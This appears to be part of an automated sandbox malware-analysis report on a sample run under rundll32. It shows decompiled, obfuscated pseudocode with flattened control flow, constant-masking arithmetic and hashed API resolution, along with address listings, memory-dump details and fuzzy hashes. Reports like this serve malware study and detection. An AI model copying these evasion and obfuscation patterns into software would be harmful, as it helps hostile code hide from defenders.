				_v48 = 0x2ab377;
				_v48 = _v48 << 0xd;
				_v48 = _v48 + 0x21bb;
				_v48 = _v48 ^ 0x5663e2ae;
				while(1) {
					L1:
					_push(0x5c);
					while(_t225 != 0xb8820d) {
						if(_t225 == 0x1effdba) {
							_t219 = E0068912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
							_t224 = _t219;
							_t261 =  &(_t261[5]);
							if(_t219 != 0) {
								_t225 = 0xb9a00d9;
								goto L11;
							}
						} else {
							if(_t225 == 0x37f2dd7) {
								_t225 = 0x43cb3ac;
								continue;
							} else {
								if(_t225 == 0x43cb3ac) {
									_t258 =  *0x6a3e10; // 0x0
									_t259 = _t258 + 0x1c;
									while( *_t259 != _t246) {
										_t259 = _t259 + 2;
									}
									_t257 = _t259 + 2;
									_t225 = 0x1effdba;
									goto L12;
								} else {
									if(_t225 == 0x5d9bea5) {
										E00698F9E(_v32, _v92, _v52, _v36, _t260);
										_t261 =  &(_t261[3]);
										_t225 = 0xb8820d;
										goto L11;
									} else {
										if(_t225 == _t218) {
											E0068E249(_v96, _t260, _v40, _v56, _v60);
											_t261 =  &(_t261[3]);
											_t251 =  !=  ? 1 : _t251;
											_t225 = 0x5d9bea5;
											L11:
											_t246 = 0x5c;
											L12:
											_t218 = 0x9850ebe;
											continue;
										} else {
											if(_t225 != 0xb9a00d9) {
												L22:
												if(_t225 != 0x8a80d0f) {
													continue;
												}
											} else {
												_t260 = E006842C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
												_t261 =  &(_t261[5]);
												_t218 = 0x9850ebe;
												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
												goto L1;
											}
										}
									}
								}
							}
						}
						return _t251;
					}
					E00698F9E(_v16, _v76, _v80, _v48, _t224);
					_t261 =  &(_t261[3]);
					_t225 = 0x8a80d0f;
					_t218 = 0x9850ebe;
					_t246 = 0x5c;
					goto L22;
				}
			}











































                                                                                                                      0x0069473c
                                                                                                                      0x0069473f
                                                                                                                      0x00694749
                                                                                                                      0x00694751
                                                                                                                      0x0069475a
                                                                                                                      0x0069475c
                                                                                                                      0x00694760
                                                                                                                      0x00694768
                                                                                                                      0x00694770
                                                                                                                      0x00694778
                                                                                                                      0x00694780
                                                                                                                      0x00694788
                                                                                                                      0x00694793
                                                                                                                      0x00694798
                                                                                                                      0x0069479e
                                                                                                                      0x006947a3
                                                                                                                      0x006947ab
                                                                                                                      0x006947b8
                                                                                                                      0x006947bb
                                                                                                                      0x006947bf
                                                                                                                      0x006947c7
                                                                                                                      0x006947cf
                                                                                                                      0x006947d7
                                                                                                                      0x006947db
                                                                                                                      0x006947e0
                                                                                                                      0x006947e1
                                                                                                                      0x006947e5
                                                                                                                      0x006947ed
                                                                                                                      0x006947f5
                                                                                                                      0x00694803
                                                                                                                      0x00694807
                                                                                                                      0x0069480f
                                                                                                                      0x0069481c
                                                                                                                      0x00694820
                                                                                                                      0x00694828
                                                                                                                      0x00694830
                                                                                                                      0x00694838
                                                                                                                      0x00694840
                                                                                                                      0x00694848
                                                                                                                      0x00694850
                                                                                                                      0x00694858
                                                                                                                      0x00694862
                                                                                                                      0x00694866
                                                                                                                      0x0069486e
                                                                                                                      0x00694876
                                                                                                                      0x0069487e
                                                                                                                      0x00694886
                                                                                                                      0x0069488e
                                                                                                                      0x0069489b
                                                                                                                      0x0069489f
                                                                                                                      0x006948a7
                                                                                                                      0x006948af
                                                                                                                      0x006948b4
                                                                                                                      0x006948b9
                                                                                                                      0x006948c1
                                                                                                                      0x006948c9
                                                                                                                      0x006948d1
                                                                                                                      0x006948d9
                                                                                                                      0x006948e1
                                                                                                                      0x006948e9
                                                                                                                      0x006948f1
                                                                                                                      0x006948f9
                                                                                                                      0x00694901
                                                                                                                      0x00694909
                                                                                                                      0x00694910
                                                                                                                      0x00694915
                                                                                                                      0x0069491d
                                                                                                                      0x00694925
                                                                                                                      0x0069492d
                                                                                                                      0x00694935
                                                                                                                      0x00694944
                                                                                                                      0x00694947
                                                                                                                      0x0069494b
                                                                                                                      0x00694955
                                                                                                                      0x00694959
                                                                                                                      0x00694961
                                                                                                                      0x00694969
                                                                                                                      0x00694971
                                                                                                                      0x00694976
                                                                                                                      0x0069497e
                                                                                                                      0x0069498e
                                                                                                                      0x00694992
                                                                                                                      0x0069499a
                                                                                                                      0x006949a2
                                                                                                                      0x006949aa
                                                                                                                      0x006949b2
                                                                                                                      0x006949ba
                                                                                                                      0x006949bf
                                                                                                                      0x006949c7
                                                                                                                      0x006949cf
                                                                                                                      0x006949d7
                                                                                                                      0x006949df
                                                                                                                      0x006949eb
                                                                                                                      0x006949ee
                                                                                                                      0x006949f2
                                                                                                                      0x006949f6
                                                                                                                      0x006949fa
                                                                                                                      0x00694a03
                                                                                                                      0x00694a0b
                                                                                                                      0x00694a13
                                                                                                                      0x00694a18
                                                                                                                      0x00694a20
                                                                                                                      0x00694a28
                                                                                                                      0x00694a28
                                                                                                                      0x00694a28
                                                                                                                      0x00694a2b
                                                                                                                      0x00694a3d
                                                                                                                      0x00694b36
                                                                                                                      0x00694b3b
                                                                                                                      0x00694b3d
                                                                                                                      0x00694b42
                                                                                                                      0x00694b44
                                                                                                                      0x00000000
                                                                                                                      0x00694b44
                                                                                                                      0x00694a43
                                                                                                                      0x00694a49
                                                                                                                      0x00694b16
                                                                                                                      0x00000000
                                                                                                                      0x00694a4f
                                                                                                                      0x00694a55
                                                                                                                      0x00694af9
                                                                                                                      0x00694aff
                                                                                                                      0x00694b07
                                                                                                                      0x00694b04
                                                                                                                      0x00694b04
                                                                                                                      0x00694b0c
                                                                                                                      0x00694b0f
                                                                                                                      0x00000000
                                                                                                                      0x00694a5b
                                                                                                                      0x00694a61
                                                                                                                      0x00694aea
                                                                                                                      0x00694aef
                                                                                                                      0x00694af2
                                                                                                                      0x00000000
                                                                                                                      0x00694a63
                                                                                                                      0x00694a65
                                                                                                                      0x00694ab7
                                                                                                                      0x00694abe
                                                                                                                      0x00694ac4
                                                                                                                      0x00694ac7
                                                                                                                      0x00694acc
                                                                                                                      0x00694ace
                                                                                                                      0x00694acf
                                                                                                                      0x00694acf
                                                                                                                      0x00000000
                                                                                                                      0x00694a67
                                                                                                                      0x00694a6d
                                                                                                                      0x00694b71
                                                                                                                      0x00694b77
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00694a73
                                                                                                                      0x00694a8f
                                                                                                                      0x00694a91
                                                                                                                      0x00694a9b
                                                                                                                      0x00694aa0
                                                                                                                      0x00000000
                                                                                                                      0x00694aa0
                                                                                                                      0x00694a6d
                                                                                                                      0x00694a65
                                                                                                                      0x00694a61
                                                                                                                      0x00694a55
                                                                                                                      0x00694a49
                                                                                                                      0x00694b86
                                                                                                                      0x00694b86
                                                                                                                      0x00694b5c
                                                                                                                      0x00694b61
                                                                                                                      0x00694b64
                                                                                                                      0x00694b69
                                                                                                                      0x00694b70
                                                                                                                      0x00000000
                                                                                                                      0x00694b70

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ^T$mU`
                                                                                                                      • API String ID: 0-1245783925
                                                                                                                      • Opcode ID: 33f334b798bbbe12c0e0e6a2e763db6d41bbe2b6c4420b74d4b0ef1edb042458
                                                                                                                      • Instruction ID: 0279eaec80e2b4cc30f3607030fb84253d06e7cd1ffa89a24b10c82543934175
                                                                                                                      • Opcode Fuzzy Hash: 33f334b798bbbe12c0e0e6a2e763db6d41bbe2b6c4420b74d4b0ef1edb042458
                                                                                                                      • Instruction Fuzzy Hash: 86B141715093409FC758CF25898981BFBE2FBC8758F108A1DF69A96260D7B1CA0ACF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069A666 Relevance: 2.7, Strings: 2, Instructions: 214COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0069A666(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t185;
				void* _t187;
				signed int _t194;
				signed int _t203;
				intOrPtr* _t204;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				signed int _t239;
				signed int* _t240;

				_t204 = __ecx;
				_t240 =  &_v208;
				_v144 = __ecx;
				_v188 = 0x57b051;
				_v188 = _v188 ^ 0x0e33ee27;
				_v188 = _v188 * 0x1d;
				_t236 = 0xac5721c;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x15e508b7;
				_v156 = 0xb3c586;
				_v156 = _v156 + 0xc4f5;
				_v156 = _v156 ^ 0x00bed25a;
				_v168 = 0x711032;
				_v168 = _v168 << 8;
				_v168 = _v168 + 0x5169;
				_v168 = _v168 ^ 0x711dace8;
				_v192 = 0xa2549d;
				_v192 = _v192 + 0x52ae;
				_v192 = _v192 >> 1;
				_v192 = _v192 >> 3;
				_v192 = _v192 ^ 0x000eb53b;
				_v140 = 0xe7e5a1;
				_t231 = 0x32;
				_v140 = _v140 * 0x50;
				_v140 = _v140 ^ 0x4874e895;
				_v208 = 0x1967bb;
				_v208 = _v208 << 4;
				_v208 = _v208 | 0x201d9a42;
				_v208 = _v208 / _t231;
				_v208 = _v208 ^ 0x00a7f54f;
				_v152 = 0x52a7fc;
				_v152 = _v152 + 0x45a2;
				_v152 = _v152 ^ 0x0052edd3;
				_v160 = 0x3027b3;
				_v160 = _v160 + 0xfd14;
				_v160 = _v160 ^ 0x0036c553;
				_v180 = 0x38862e;
				_v180 = _v180 ^ 0x0f350481;
				_t232 = 0x7c;
				_v180 = _v180 * 0x65;
				_v180 = _v180 ^ 0xf053ee57;
				_v136 = 0x356a19;
				_v136 = _v136 ^ 0xbed63dcb;
				_v136 = _v136 ^ 0xbeeb3706;
				_v164 = 0x14aaf;
				_v164 = _v164 + 0xffffc1af;
				_v164 = _v164 ^ 0x000285a1;
				_v200 = 0x7f3e04;
				_v200 = _v200 * 0x53;
				_v200 = _v200 + 0xffffdc1b;
				_v200 = _v200 + 0x69f9;
				_v200 = _v200 ^ 0x2945b47b;
				_v148 = 0xc6ed1e;
				_v148 = _v148 >> 6;
				_v148 = _v148 ^ 0x0006dab0;
				_v172 = 0x6d07b9;
				_v172 = _v172 / _t232;
				_t233 = 0x35;
				_v172 = _v172 / _t233;
				_v172 = _v172 ^ 0x00041e3e;
				_v204 = 0x57aab;
				_v204 = _v204 + 0xdcdc;
				_v204 = _v204 * 0x48;
				_v204 = _v204 << 8;
				_v204 = _v204 ^ 0xc89fb5e3;
				_v132 = 0xff84eb;
				_v132 = _v132 << 5;
				_v132 = _v132 ^ 0x1ff23c26;
				_v196 = 0xcb0ee1;
				_v196 = _v196 | 0xd8d8bfc1;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x8dbe7284;
				_v184 = 0x3f345e;
				_t234 = 0x7b;
				_v184 = _v184 * 0x5e;
				_v184 = _v184 ^ 0x1738d684;
				_v176 = 0x75d12f;
				_t239 = _v184;
				_t203 = _v184;
				_t235 = _v184;
				_v176 = _v176 / _t234;
				_v176 = _v176 + 0xb925;
				_v176 = _v176 ^ 0x0007fac1;
				while(1) {
					L1:
					_t185 = 0x80ddafd;
					do {
						while(_t236 != 0x3002390) {
							if(_t236 == _t185) {
								_push(_v204);
								_push(_v172);
								_t187 = E0069DCF7(_v148, 0x681540, __eflags);
								_push(_t235);
								_push( &_v128);
								_push(_t187);
								_push(_t239);
								_push(_t203);
								 *((intOrPtr*)(E0068A42D(0xab2a8d8a, 0x2b7)))();
								E0068A8B0(_v132, _t187, _v196);
								_t236 = 0xc2d90a2;
								goto L11;
							} else {
								if(_t236 == 0x94501ee) {
									_t194 = E00690AE0(0x10, 1);
									_push(_v140);
									_t239 = _t194;
									_push( &_v128);
									_push(_t239);
									_push(0xb);
									E006880E3(_v168, _v192);
									_t236 = 0x3002390;
									L11:
									_t240 =  &(_t240[6]);
									L12:
									_t204 = _v144;
									goto L1;
								} else {
									if(_t236 == 0xac5721c) {
										_t236 = 0x94501ee;
										continue;
									} else {
										if(_t236 == 0xc2d90a2) {
											E00698519(_v184, _v176, _t235);
										} else {
											if(_t236 != 0xd4e1cec) {
												goto L17;
											} else {
												_t239 = 0x4000;
												_push(_t204);
												_push(_t204);
												_t203 = E00687FF2(0x4000);
												_t185 = 0x80ddafd;
												_t204 = _v144;
												_t236 =  !=  ? 0x80ddafd : 0xc2d90a2;
												continue;
											}
										}
									}
								}
							}
							L20:
							return _t203;
						}
						_t235 = E00684816(_v208,  *((intOrPtr*)(_t204 + 4)), _v152,  *_t204, _v160, _v180);
						_t240 =  &(_t240[4]);
						__eflags = _t235;
						if(__eflags == 0) {
							_t204 = _v144;
							_t236 = 0x99c1651;
							_t185 = 0x80ddafd;
							goto L17;
						} else {
							_t236 = 0xd4e1cec;
							goto L12;
						}
						goto L20;
						L17:
						__eflags = _t236 - 0x99c1651;
					} while (__eflags != 0);
					goto L20;
				}
			}





































                                                                                                                      0x0069a666
                                                                                                                      0x0069a666
                                                                                                                      0x0069a670
                                                                                                                      0x0069a674
                                                                                                                      0x0069a67e
                                                                                                                      0x0069a68b
                                                                                                                      0x0069a68f
                                                                                                                      0x0069a694
                                                                                                                      0x0069a699
                                                                                                                      0x0069a6a1
                                                                                                                      0x0069a6a9
                                                                                                                      0x0069a6b1
                                                                                                                      0x0069a6b9
                                                                                                                      0x0069a6c1
                                                                                                                      0x0069a6c6
                                                                                                                      0x0069a6ce
                                                                                                                      0x0069a6d6
                                                                                                                      0x0069a6de
                                                                                                                      0x0069a6e6
                                                                                                                      0x0069a6ea
                                                                                                                      0x0069a6ef
                                                                                                                      0x0069a6f7
                                                                                                                      0x0069a706
                                                                                                                      0x0069a709
                                                                                                                      0x0069a70d
                                                                                                                      0x0069a715
                                                                                                                      0x0069a71d
                                                                                                                      0x0069a722
                                                                                                                      0x0069a732
                                                                                                                      0x0069a736
                                                                                                                      0x0069a73e
                                                                                                                      0x0069a746
                                                                                                                      0x0069a74e
                                                                                                                      0x0069a756
                                                                                                                      0x0069a75e
                                                                                                                      0x0069a766
                                                                                                                      0x0069a76e
                                                                                                                      0x0069a776
                                                                                                                      0x0069a783
                                                                                                                      0x0069a786
                                                                                                                      0x0069a78a
                                                                                                                      0x0069a792
                                                                                                                      0x0069a79a
                                                                                                                      0x0069a7a2
                                                                                                                      0x0069a7aa
                                                                                                                      0x0069a7b2
                                                                                                                      0x0069a7ba
                                                                                                                      0x0069a7c2
                                                                                                                      0x0069a7cf
                                                                                                                      0x0069a7d3
                                                                                                                      0x0069a7db
                                                                                                                      0x0069a7e3
                                                                                                                      0x0069a7eb
                                                                                                                      0x0069a7f3
                                                                                                                      0x0069a7f8
                                                                                                                      0x0069a800
                                                                                                                      0x0069a810
                                                                                                                      0x0069a818
                                                                                                                      0x0069a81b
                                                                                                                      0x0069a81f
                                                                                                                      0x0069a827
                                                                                                                      0x0069a82f
                                                                                                                      0x0069a83c
                                                                                                                      0x0069a842
                                                                                                                      0x0069a847
                                                                                                                      0x0069a84f
                                                                                                                      0x0069a857
                                                                                                                      0x0069a85c
                                                                                                                      0x0069a864
                                                                                                                      0x0069a86c
                                                                                                                      0x0069a874
                                                                                                                      0x0069a879
                                                                                                                      0x0069a881
                                                                                                                      0x0069a890
                                                                                                                      0x0069a891
                                                                                                                      0x0069a895
                                                                                                                      0x0069a89d
                                                                                                                      0x0069a8ab
                                                                                                                      0x0069a8af
                                                                                                                      0x0069a8b3
                                                                                                                      0x0069a8b7
                                                                                                                      0x0069a8bb
                                                                                                                      0x0069a8c3
                                                                                                                      0x0069a8cb
                                                                                                                      0x0069a8cb
                                                                                                                      0x0069a8cb
                                                                                                                      0x0069a8d0
                                                                                                                      0x0069a8d0
                                                                                                                      0x0069a8de
                                                                                                                      0x0069a983
                                                                                                                      0x0069a98c
                                                                                                                      0x0069a994
                                                                                                                      0x0069a99b
                                                                                                                      0x0069a9a7
                                                                                                                      0x0069a9a8
                                                                                                                      0x0069a9a9
                                                                                                                      0x0069a9aa
                                                                                                                      0x0069a9b6
                                                                                                                      0x0069a9c2
                                                                                                                      0x0069a9c7
                                                                                                                      0x00000000
                                                                                                                      0x0069a8e4
                                                                                                                      0x0069a8ea
                                                                                                                      0x0069a952
                                                                                                                      0x0069a957
                                                                                                                      0x0069a95f
                                                                                                                      0x0069a969
                                                                                                                      0x0069a96a
                                                                                                                      0x0069a96b
                                                                                                                      0x0069a96d
                                                                                                                      0x0069a972
                                                                                                                      0x0069a977
                                                                                                                      0x0069a977
                                                                                                                      0x0069a97a
                                                                                                                      0x0069a97a
                                                                                                                      0x00000000
                                                                                                                      0x0069a8ec
                                                                                                                      0x0069a8f2
                                                                                                                      0x0069a93f
                                                                                                                      0x00000000
                                                                                                                      0x0069a8f4
                                                                                                                      0x0069a8fa
                                                                                                                      0x0069aa1d
                                                                                                                      0x0069a900
                                                                                                                      0x0069a906
                                                                                                                      0x00000000
                                                                                                                      0x0069a90c
                                                                                                                      0x0069a910
                                                                                                                      0x0069a91f
                                                                                                                      0x0069a920
                                                                                                                      0x0069a926
                                                                                                                      0x0069a930
                                                                                                                      0x0069a936
                                                                                                                      0x0069a93a
                                                                                                                      0x00000000
                                                                                                                      0x0069a93a
                                                                                                                      0x0069a906
                                                                                                                      0x0069a8fa
                                                                                                                      0x0069a8f2
                                                                                                                      0x0069a8ea
                                                                                                                      0x0069aa26
                                                                                                                      0x0069aa2f
                                                                                                                      0x0069aa2f
                                                                                                                      0x0069a9e8
                                                                                                                      0x0069a9ea
                                                                                                                      0x0069a9ed
                                                                                                                      0x0069a9ef
                                                                                                                      0x0069a9f8
                                                                                                                      0x0069a9fc
                                                                                                                      0x0069aa01
                                                                                                                      0x00000000
                                                                                                                      0x0069a9f1
                                                                                                                      0x0069a9f1
                                                                                                                      0x00000000
                                                                                                                      0x0069a9f1
                                                                                                                      0x00000000
                                                                                                                      0x0069aa06
                                                                                                                      0x0069aa06
                                                                                                                      0x0069aa06
                                                                                                                      0x00000000
                                                                                                                      0x0069aa12

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ^4?$iQ
                                                                                                                      • API String ID: 0-3971506469
                                                                                                                      • Opcode ID: f202688f8600f8c8b82e542b88060c84383661333cd595279c7a24a40096d372
                                                                                                                      • Instruction ID: f3a99f72223b9312cd5b82235a25beb060e30b55aa827f96e8b7ec7b130cc9e5
                                                                                                                      • Opcode Fuzzy Hash: f202688f8600f8c8b82e542b88060c84383661333cd595279c7a24a40096d372
                                                                                                                      • Instruction Fuzzy Hash: A9A162719083409FC354CE69C58990BFBE6BBC4758F40492EF99AA6260C7B5D94ACF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00698BE3 Relevance: 2.7, Strings: 2, Instructions: 204COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 82%
                                                                                                                      			E00698BE3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _v88;
				intOrPtr _v92;
				signed int _t203;
				short _t206;
				short _t211;
				signed int _t214;
				void* _t216;
				intOrPtr _t238;
				void* _t239;
				void* _t240;
				short* _t241;
				short* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				void* _t251;

				_v92 = 0x476c75;
				asm("stosd");
				_t216 = 0xb7209d2;
				_t243 = 0x73;
				asm("stosd");
				asm("stosd");
				_t238 =  *0x6a3e10; // 0x0
				_v16 = 0xe95677;
				_t239 = _t238 + 0x1c;
				_v16 = _v16 + 0xffffde88;
				_v16 = _v16 | 0xcd71b475;
				_v16 = _v16 + 0xffffb9cf;
				_v16 = _v16 ^ 0xcdf0e35f;
				_v48 = 0xdf79ef;
				_v48 = _v48 / _t243;
				_t244 = 0x6b;
				_v48 = _v48 * 0x6d;
				_v48 = _v48 ^ 0x00d012e0;
				_v20 = 0x9de8b4;
				_v20 = _v20 + 0xffff612d;
				_v20 = _v20 / _t244;
				_v20 = _v20 ^ 0xc642351f;
				_v20 = _v20 ^ 0xc646a40f;
				_v52 = 0x8fb5bf;
				_v52 = _v52 << 0xa;
				_v52 = _v52 | 0x07a5acc8;
				_v52 = _v52 ^ 0x3ff13d54;
				_v68 = 0x5451dc;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x054b95e9;
				_v56 = 0x52bd8b;
				_v56 = _v56 >> 2;
				_t245 = 0x43;
				_v56 = _v56 * 0x7a;
				_v56 = _v56 ^ 0x09d97bb2;
				_v24 = 0x3d3b88;
				_v24 = _v24 / _t245;
				_v24 = _v24 + 0xfffff551;
				_v24 = _v24 ^ 0x58fd9949;
				_v24 = _v24 ^ 0x58f7485b;
				_v28 = 0x8d7fa4;
				_v28 = _v28 | 0x74f1f66b;
				_v28 = _v28 + 0xbcb0;
				_t246 = 0x1d;
				_v28 = _v28 / _t246;
				_v28 = _v28 ^ 0x0406308a;
				_v76 = 0xb13dbd;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0001a54a;
				_v72 = 0x3dff58;
				_v72 = _v72 + 0xffff5d9c;
				_v72 = _v72 ^ 0x00301633;
				_v8 = 0xd63a62;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xdca434f7;
				_v8 = _v8 ^ 0xdd0cf0dc;
				_v44 = 0x6f20d8;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0xaa766a49;
				_v44 = _v44 ^ 0xaa79f73d;
				_v64 = 0x5810b3;
				_t247 = 0x3e;
				_v64 = _v64 * 0x13;
				_v64 = _v64 ^ 0x068d2e2f;
				_v60 = 0xa1705b;
				_v60 = _v60 / _t247;
				_v60 = _v60 ^ 0x000746d3;
				_v12 = 0xe49076;
				_v12 = _v12 | 0xf94b921d;
				_t248 = 0x66;
				_v12 = _v12 / _t248;
				_v12 = _v12 | 0x30c6fb91;
				_v12 = _v12 ^ 0x32fd72cc;
				_v40 = 0x4af1f5;
				_v40 = _v40 + 0xffff1f3a;
				_v40 = _v40 + 0x5998;
				_v40 = _v40 | 0x0efc634a;
				_v40 = _v40 ^ 0x0ef1d3e1;
				_v36 = 0xca0e2e;
				_v36 = _v36 + 0xa6ab;
				_v36 = _v36 * 0x17;
				_v36 = _v36 | 0xed84f45f;
				_v36 = _v36 ^ 0xffb3e96f;
				_v32 = 0x9f068d;
				_v32 = _v32 | 0xccdcedf7;
				_v32 = _v32 >> 8;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0xdfe821c7;
				do {
					while(_t216 != 0x5ccdb59) {
						if(_t216 == 0x80e5149) {
							_push(_v32);
							_push(_t239);
							_push(3);
							_push(1);
							E006880E3(_v40, _v36);
							 *((short*)(_t239 + 6)) = 0;
							return 0;
						}
						if(_t216 == 0xb7209d2) {
							_t211 = E0069D25E(_t216);
							_t216 = 0x5ccdb59;
							continue;
						}
						if(_t216 != 0xeb2e9e3) {
							goto L8;
						}
						_t214 = E00690AE0(0x10, 4);
						_push(_v12);
						_t250 = _t214;
						_push(_t239);
						_push(_t250);
						_push(1);
						E006880E3(_v64, _v60);
						_t251 = _t251 + 0x18;
						_t242 = _t239 + _t250 * 2;
						_t216 = 0x80e5149;
						_t211 = 0x2e;
						 *_t242 = _t211;
						_t239 = _t242 + 2;
					}
					_t203 = E00690AE0(0x10, 4);
					_push(_v24);
					_t249 = _t203;
					_push(_t239);
					_push(1);
					_push(2);
					E006880E3(_v68, _v56);
					_push(_v72);
					_t240 = _t239 + 2;
					_push(_t240);
					_push(_t249);
					_push(1);
					E006880E3(_v28, _v76);
					_t251 = _t251 + 0x28;
					_t241 = _t240 + _t249 * 2;
					_t216 = 0xeb2e9e3;
					_t206 = 0x5c;
					 *_t241 = _t206;
					_t239 = _t241 + 2;
					L8:
				} while (_t216 != 0x3f21c37);
				return _t211;
			}










































                                                                                                                      0x00698be9
                                                                                                                      0x00698bf9
                                                                                                                      0x00698bfa
                                                                                                                      0x00698c01
                                                                                                                      0x00698c04
                                                                                                                      0x00698c05
                                                                                                                      0x00698c06
                                                                                                                      0x00698c0c
                                                                                                                      0x00698c13
                                                                                                                      0x00698c16
                                                                                                                      0x00698c1d
                                                                                                                      0x00698c24
                                                                                                                      0x00698c2b
                                                                                                                      0x00698c32
                                                                                                                      0x00698c40
                                                                                                                      0x00698c47
                                                                                                                      0x00698c4a
                                                                                                                      0x00698c4d
                                                                                                                      0x00698c54
                                                                                                                      0x00698c5b
                                                                                                                      0x00698c69
                                                                                                                      0x00698c6c
                                                                                                                      0x00698c73
                                                                                                                      0x00698c7a
                                                                                                                      0x00698c81
                                                                                                                      0x00698c85
                                                                                                                      0x00698c8c
                                                                                                                      0x00698c93
                                                                                                                      0x00698c9a
                                                                                                                      0x00698c9e
                                                                                                                      0x00698ca5
                                                                                                                      0x00698cac
                                                                                                                      0x00698cb4
                                                                                                                      0x00698cb7
                                                                                                                      0x00698cba
                                                                                                                      0x00698cc1
                                                                                                                      0x00698ccf
                                                                                                                      0x00698cd2
                                                                                                                      0x00698cd9
                                                                                                                      0x00698ce0
                                                                                                                      0x00698ce7
                                                                                                                      0x00698cee
                                                                                                                      0x00698cf5
                                                                                                                      0x00698cff
                                                                                                                      0x00698d02
                                                                                                                      0x00698d05
                                                                                                                      0x00698d0c
                                                                                                                      0x00698d13
                                                                                                                      0x00698d17
                                                                                                                      0x00698d1e
                                                                                                                      0x00698d25
                                                                                                                      0x00698d2c
                                                                                                                      0x00698d33
                                                                                                                      0x00698d3a
                                                                                                                      0x00698d3e
                                                                                                                      0x00698d42
                                                                                                                      0x00698d49
                                                                                                                      0x00698d50
                                                                                                                      0x00698d57
                                                                                                                      0x00698d5b
                                                                                                                      0x00698d64
                                                                                                                      0x00698d6b
                                                                                                                      0x00698d78
                                                                                                                      0x00698d7b
                                                                                                                      0x00698d7e
                                                                                                                      0x00698d85
                                                                                                                      0x00698d93
                                                                                                                      0x00698d96
                                                                                                                      0x00698d9d
                                                                                                                      0x00698da4
                                                                                                                      0x00698dae
                                                                                                                      0x00698db1
                                                                                                                      0x00698db4
                                                                                                                      0x00698dbb
                                                                                                                      0x00698dc2
                                                                                                                      0x00698dc9
                                                                                                                      0x00698dd0
                                                                                                                      0x00698dd7
                                                                                                                      0x00698dde
                                                                                                                      0x00698de5
                                                                                                                      0x00698dec
                                                                                                                      0x00698df7
                                                                                                                      0x00698dfa
                                                                                                                      0x00698e01
                                                                                                                      0x00698e08
                                                                                                                      0x00698e0f
                                                                                                                      0x00698e16
                                                                                                                      0x00698e1a
                                                                                                                      0x00698e1e
                                                                                                                      0x00698e25
                                                                                                                      0x00698e25
                                                                                                                      0x00698e33
                                                                                                                      0x00698ef3
                                                                                                                      0x00698efc
                                                                                                                      0x00698efd
                                                                                                                      0x00698eff
                                                                                                                      0x00698f01
                                                                                                                      0x00698f0b
                                                                                                                      0x00000000
                                                                                                                      0x00698f0b
                                                                                                                      0x00698e3f
                                                                                                                      0x00698e8c
                                                                                                                      0x00698e91
                                                                                                                      0x00000000
                                                                                                                      0x00698e91
                                                                                                                      0x00698e47
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00698e57
                                                                                                                      0x00698e5c
                                                                                                                      0x00698e62
                                                                                                                      0x00698e67
                                                                                                                      0x00698e68
                                                                                                                      0x00698e69
                                                                                                                      0x00698e6b
                                                                                                                      0x00698e70
                                                                                                                      0x00698e73
                                                                                                                      0x00698e76
                                                                                                                      0x00698e7d
                                                                                                                      0x00698e7e
                                                                                                                      0x00698e81
                                                                                                                      0x00698e81
                                                                                                                      0x00698ea2
                                                                                                                      0x00698ea7
                                                                                                                      0x00698ead
                                                                                                                      0x00698eb2
                                                                                                                      0x00698eb3
                                                                                                                      0x00698eb5
                                                                                                                      0x00698eb7
                                                                                                                      0x00698ebc
                                                                                                                      0x00698ec2
